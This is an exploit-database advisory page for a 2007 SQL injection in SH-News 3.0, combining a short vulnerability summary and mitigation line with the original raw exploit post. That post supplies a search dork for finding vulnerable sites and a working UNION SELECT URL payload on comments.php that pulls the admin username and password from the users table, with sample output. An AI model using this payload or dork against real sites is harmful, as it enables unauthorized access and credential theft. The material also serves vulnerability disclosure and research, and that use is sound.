SH-News 3.0 SQL Injection Vulnerability

vendor:

SH-News

by:

hadihadi

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: SH-News

Affected Version From: SH-News 3.0

Affected Version To: SH-News 3.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

SH-News 3.0 SQL Injection Vulnerability

The vulnerability allows an attacker to execute arbitrary SQL queries through the 'id' parameter in the 'comments.php' file. By using a UNION SELECT statement, the attacker can retrieve sensitive information such as usernames and passwords from the 'shnews3_users' table.

Mitigation:

The vulnerability can be mitigated by implementing proper input validation and parameterized queries.

Source

Exploit-DB raw data:

           
             ########################################################################
             #                                                                      #
             #    ...:::::SH-News 3.0 SQL Injection Vulnerbility ::::....           #           
             ########################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By : hadihadi

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
-----------------------------------
dork: Powered by SH-News 3.0
-----------------------------------
vlu:
http://site.com/patch/comments.php?id=-1'union%20select%201,2,nick,4,5,password,7%20from%20shnews3_users%20where%20id=1/*

-------------------------------------
you can see somting such as:
Poster:   admin Posted: 01.01.1970 03:30
z4478ad
#############
'admin' is admin user & 'z4478ad' is admin password
-------------------------------------

# milw0rm.com [2007-12-09]